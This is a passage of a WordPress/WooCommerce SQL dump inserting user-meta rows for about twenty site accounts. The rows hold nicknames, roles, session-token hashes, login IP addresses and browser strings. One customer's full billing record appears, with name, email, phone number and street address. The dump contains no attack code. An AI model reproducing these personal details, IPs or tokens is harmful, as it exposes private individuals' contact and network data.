INSERT INTO `wp_usermeta` VALUES (1696, 86, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1697, 86, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1698, 86, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1699, 86, '_yoast_wpseo_profile_updated', '1476879890'); 
INSERT INTO `wp_usermeta` VALUES (1700, 86, 'session_tokens', 'a:1:{s:64:"bffb3bb7a4b9e57020146c0371d6c7c16ebafa1b66b5cd032dc0b6033fbde448";a:4:{s:10:"expiration";i:1478089490;s:2:"ip";s:11:"199.64.7.57";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1476879890;}}'); 
INSERT INTO `wp_usermeta` VALUES (1701, 86, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1703, 87, 'nickname', 'brianmillwee'); 
INSERT INTO `wp_usermeta` VALUES (1704, 87, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1705, 87, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1706, 87, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1707, 87, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1708, 87, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1709, 87, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1710, 87, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1711, 87, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1712, 87, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1713, 87, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1714, 87, '_yoast_wpseo_profile_updated', '1476897820'); 
INSERT INTO `wp_usermeta` VALUES (1715, 87, 'session_tokens', 'a:1:{s:64:"199deb7fc1bf8d692ca61c632141c36a90c025c469934b945d23c48a2b72de9c";a:4:{s:10:"expiration";i:1478107421;s:2:"ip";s:11:"71.8.37.122";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1476897821;}}'); 
INSERT INTO `wp_usermeta` VALUES (1717, 88, 'nickname', 'paul.humphreys'); 
INSERT INTO `wp_usermeta` VALUES (1718, 88, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1719, 88, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1720, 88, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1721, 88, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1722, 88, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1723, 88, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1724, 88, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1725, 88, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1726, 88, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1727, 88, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1728, 88, '_yoast_wpseo_profile_updated', '1476897897'); 
INSERT INTO `wp_usermeta` VALUES (1729, 88, 'session_tokens', 'a:1:{s:64:"230dbb83909f1785a9c5ace33d7baa74a11642e899e991f6a94097838ae77cd4";a:4:{s:10:"expiration";i:1500496025;s:2:"ip";s:13:"12.125.233.42";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0";s:5:"login";i:1500323225;}}'); 
INSERT INTO `wp_usermeta` VALUES (1730, 88, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1731, 89, 'nickname', 'fernan76'); 
INSERT INTO `wp_usermeta` VALUES (1732, 89, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1733, 89, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1734, 89, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1735, 89, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1736, 89, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1737, 89, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1738, 89, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1739, 89, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1740, 89, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1741, 89, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1742, 89, '_yoast_wpseo_profile_updated', '1476899014'); 
INSERT INTO `wp_usermeta` VALUES (1743, 89, 'session_tokens', 'a:1:{s:64:"ab96c0d93538e08f1bb263b6287714dd6ff876372e4ff97aaccdbcd7ac6896ff";a:4:{s:10:"expiration";i:1478108614;s:2:"ip";s:11:"35.9.42.237";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1476899014;}}'); 
INSERT INTO `wp_usermeta` VALUES (1744, 89, 'billing_first_name', 'Donna'); 
INSERT INTO `wp_usermeta` VALUES (1745, 89, 'billing_last_name', 'Fernandez'); 
INSERT INTO `wp_usermeta` VALUES (1746, 89, 'billing_company', 'Michigan State Univerdity'); 
INSERT INTO `wp_usermeta` VALUES (1747, 89, 'billing_email', 'fernan76@msu.edu'); 
INSERT INTO `wp_usermeta` VALUES (1748, 89, 'billing_phone', '5173555135'); 
INSERT INTO `wp_usermeta` VALUES (1749, 89, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (1750, 89, 'billing_address_1', '428 S. Shaw Lane'); 
INSERT INTO `wp_usermeta` VALUES (1751, 89, 'billing_address_2', 'Room 2100, Engineering Building'); 
INSERT INTO `wp_usermeta` VALUES (1752, 89, 'billing_city', 'East Lansing'); 
INSERT INTO `wp_usermeta` VALUES (1753, 89, 'billing_state', 'MI'); 
INSERT INTO `wp_usermeta` VALUES (1754, 89, 'billing_postcode', '48824'); 
INSERT INTO `wp_usermeta` VALUES (1755, 89, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1757, 90, 'nickname', 'ron'); 
INSERT INTO `wp_usermeta` VALUES (1758, 90, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1759, 90, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1760, 90, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1761, 90, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1762, 90, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1763, 90, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1764, 90, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1765, 90, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1766, 90, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1767, 90, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1768, 90, '_yoast_wpseo_profile_updated', '1476947655'); 
INSERT INTO `wp_usermeta` VALUES (1770, 90, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1771, 90, 'session_tokens', 'a:1:{s:64:"5fe379b260b24ffb46d98b7dba4487f8cf7c4818f625149b4168ec58d85588e2";a:4:{s:10:"expiration";i:1477125243;s:2:"ip";s:14:"111.93.191.254";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0";s:5:"login";i:1476952443;}}'); 
INSERT INTO `wp_usermeta` VALUES (1772, 91, 'nickname', 'roscamac'); 
INSERT INTO `wp_usermeta` VALUES (1773, 91, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1774, 91, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1775, 91, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1776, 91, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1777, 91, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1778, 91, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1779, 91, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1780, 91, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1781, 91, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1782, 91, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1783, 91, '_yoast_wpseo_profile_updated', '1476980496'); 
INSERT INTO `wp_usermeta` VALUES (1784, 91, 'session_tokens', 'a:1:{s:64:"e0fbdf52373c1584411322a57440bd4f403ce4a619cf06a0d4da2f291f2d7a88";a:4:{s:10:"expiration";i:1478190096;s:2:"ip";s:13:"161.44.255.94";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1476980496;}}'); 
INSERT INTO `wp_usermeta` VALUES (1785, 91, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1786, 92, 'nickname', 'cici1976'); 
INSERT INTO `wp_usermeta` VALUES (1787, 92, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1788, 92, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1789, 92, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1790, 92, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1791, 92, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1792, 92, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1793, 92, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1794, 92, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1795, 92, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1796, 92, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1797, 92, '_yoast_wpseo_profile_updated', '1476986717'); 
INSERT INTO `wp_usermeta` VALUES (1798, 92, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (1799, 93, 'nickname', 'agrous'); 
INSERT INTO `wp_usermeta` VALUES (1800, 93, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1801, 93, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1802, 93, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1803, 93, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1804, 93, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1805, 93, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1806, 93, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1807, 93, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1808, 93, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1809, 93, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1810, 93, '_yoast_wpseo_profile_updated', '1476987929'); 
INSERT INTO `wp_usermeta` VALUES (1811, 93, 'session_tokens', 'a:1:{s:64:"63ac31ea75a0b2917ac49f769fc9093148ba028486f51e101ce7a427ab3bbf38";a:4:{s:10:"expiration";i:1478197529;s:2:"ip";s:13:"207.91.143.34";s:2:"ua";s:101:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36";s:5:"login";i:1476987929;}}'); 
INSERT INTO `wp_usermeta` VALUES (1812, 93, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1813, 94, 'nickname', 'sforde'); 
INSERT INTO `wp_usermeta` VALUES (1814, 94, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1815, 94, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1816, 94, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1817, 94, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1818, 94, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1819, 94, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1820, 94, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1821, 94, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1822, 94, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1823, 94, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1824, 94, '_yoast_wpseo_profile_updated', '1477486286'); 
INSERT INTO `wp_usermeta` VALUES (1828, 95, 'nickname', 'mjimenez'); 
INSERT INTO `wp_usermeta` VALUES (1829, 95, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1830, 95, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1831, 95, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1832, 95, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1833, 95, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1834, 95, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1835, 95, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1836, 95, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1837, 95, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1838, 95, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1839, 95, '_yoast_wpseo_profile_updated', '1477486324'); 
INSERT INTO `wp_usermeta` VALUES (1841, 96, 'nickname', 'ilcs'); 
INSERT INTO `wp_usermeta` VALUES (1842, 96, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1843, 96, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1844, 96, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1845, 96, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1846, 96, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1847, 96, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1848, 96, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1849, 96, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1850, 96, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1851, 96, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1852, 96, '_yoast_wpseo_profile_updated', '1477496586'); 
INSERT INTO `wp_usermeta` VALUES (1854, 97, 'nickname', 'grulke'); 
INSERT INTO `wp_usermeta` VALUES (1855, 97, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1856, 97, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1857, 97, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1858, 97, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1859, 97, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1860, 97, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1861, 97, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1862, 97, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1863, 97, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1864, 97, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1865, 97, '_yoast_wpseo_profile_updated', '1477046470'); 
INSERT INTO `wp_usermeta` VALUES (1866, 97, 'session_tokens', 'a:1:{s:64:"946b1b0a7bd177ad50bc94ad9b1986dd28a6a166950a7119716649e0c8fdc9b5";a:4:{s:10:"expiration";i:1478256070;s:2:"ip";s:14:"74.129.131.147";s:2:"ua";s:82:"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0) Gecko/20100101 Firefox/49.0";s:5:"login";i:1477046470;}}'); 
INSERT INTO `wp_usermeta` VALUES (1867, 97, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1868, 98, 'nickname', 'akazawa'); 
INSERT INTO `wp_usermeta` VALUES (1869, 98, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1870, 98, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1871, 98, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1872, 98, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1873, 98, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1874, 98, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1875, 98, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1876, 98, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1877, 98, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1878, 98, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1879, 98, '_yoast_wpseo_profile_updated', '1477050493'); 
INSERT INTO `wp_usermeta` VALUES (1881, 98, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1882, 99, 'nickname', 'robert'); 
INSERT INTO `wp_usermeta` VALUES (1883, 99, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1884, 99, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1885, 99, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1886, 99, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1887, 99, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1888, 99, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1889, 99, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1890, 99, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1891, 99, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1892, 99, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1893, 99, '_yoast_wpseo_profile_updated', '1477051305'); 
INSERT INTO `wp_usermeta` VALUES (1894, 99, 'session_tokens', 'a:1:{s:64:"1ef9d4b562214893bd2d5c41a632006d7bd42f889f42e65d6c831c14fa3e5f05";a:4:{s:10:"expiration";i:1478260906;s:2:"ip";s:13:"122.172.54.78";s:2:"ua";s:102:"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1477051306;}}'); 
INSERT INTO `wp_usermeta` VALUES (1895, 100, 'nickname', 'lperez'); 
INSERT INTO `wp_usermeta` VALUES (1896, 100, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1897, 100, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1898, 100, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1899, 100, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1900, 100, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1901, 100, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1902, 100, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1903, 100, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1904, 100, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1905, 100, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1906, 100, '_yoast_wpseo_profile_updated', '1477055626'); 
INSERT INTO `wp_usermeta` VALUES (1907, 100, 'session_tokens', 'a:1:{s:64:"bdc1d5f87db2c6e6a0a3ba0a8deac6e216bbe7839f18fe3f86c7ea9e1f2d2533";a:4:{s:10:"expiration";i:1478265226;s:2:"ip";s:13:"50.202.182.54";s:2:"ua";s:61:"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1477055626;}}'); 
INSERT INTO `wp_usermeta` VALUES (1908, 100, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1909, 101, 'nickname', 'michaels'); 
INSERT INTO `wp_usermeta` VALUES (1910, 101, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1911, 101, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1912, 101, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1913, 101, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1914, 101, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1915, 101, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1916, 101, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1917, 101, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1918, 101, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1919, 101, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1920, 101, '_yoast_wpseo_profile_updated', '1477056631'); 
INSERT INTO `wp_usermeta` VALUES (1921, 101, 'session_tokens', 'a:1:{s:64:"8deafe5200319368270809f201785b87faa872804c3ef67b3a667d6609fc6a88";a:4:{s:10:"expiration";i:1478266232;s:2:"ip";s:15:"200.174.129.132";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1477056632;}}'); 
INSERT INTO `wp_usermeta` VALUES (1922, 102, 'nickname', 'tmwilson'); 
INSERT INTO `wp_usermeta` VALUES (1923, 102, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1924, 102, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1925, 102, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1926, 102, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1927, 102, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1928, 102, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1929, 102, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1930, 102, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1931, 102, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1932, 102, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1933, 102, '_yoast_wpseo_profile_updated', '1477057405'); 
INSERT INTO `wp_usermeta` VALUES (1934, 102, 'session_tokens', 'a:1:{s:64:"6691f35c8009e292d790112412fe0ad64042ea954693b0d07525d576e6e1ff0a";a:4:{s:10:"expiration";i:1478267005;s:2:"ip";s:13:"199.89.130.52";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1477057405;}}'); 
INSERT INTO `wp_usermeta` VALUES (1935, 102, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1936, 103, 'nickname', 'bob.prytko'); 
INSERT INTO `wp_usermeta` VALUES (1937, 103, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1938, 103, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1939, 103, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1940, 103, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1941, 103, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1942, 103, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1943, 103, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1944, 103, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1945, 103, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1946, 103, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1947, 103, '_yoast_wpseo_profile_updated', '1477075388'); 
INSERT INTO `wp_usermeta` VALUES (1949, 103, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1950, 104, 'nickname', 'sdskeeper'); 
INSERT INTO `wp_usermeta` VALUES (1951, 104, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1952, 104, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1953, 104, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1954, 104, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1955, 104, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1956, 104, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1957, 104, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1958, 104, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1959, 104, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1960, 104, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1961, 104, '_yoast_wpseo_profile_updated', '1477127649'); 
INSERT INTO `wp_usermeta` VALUES (1963, 104, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (1964, 105, 'nickname', 'Jane.Musaeus'); 
INSERT INTO `wp_usermeta` VALUES (1965, 105, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1966, 105, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1967, 105, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1968, 105, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1969, 105, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1970, 105, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1971, 105, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1972, 105, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1973, 105, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (1974, 105, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (1975, 105, '_yoast_wpseo_profile_updated', '1477145293'); 
INSERT INTO `wp_usermeta` VALUES (1976, 105, 'session_tokens', 'a:1:{s:64:"cbfbc5ac92dbbc914bf1d0917ef000554301bfb005621c4cbc63d92d59bd7e56";a:4:{s:10:"expiration";i:1478354894;s:2:"ip";s:15:"170.133.200.240";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36";s:5:"login";i:1477145294;}}'); 
INSERT INTO `wp_usermeta` VALUES (1977, 106, 'nickname', 'tahir.mehmood'); 
INSERT INTO `wp_usermeta` VALUES (1978, 106, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1979, 106, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (1980, 106, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (1981, 106, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (1982, 106, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (1983, 106, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (1984, 106, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (1985, 106, 'show_admin_bar_front', 'true'); 
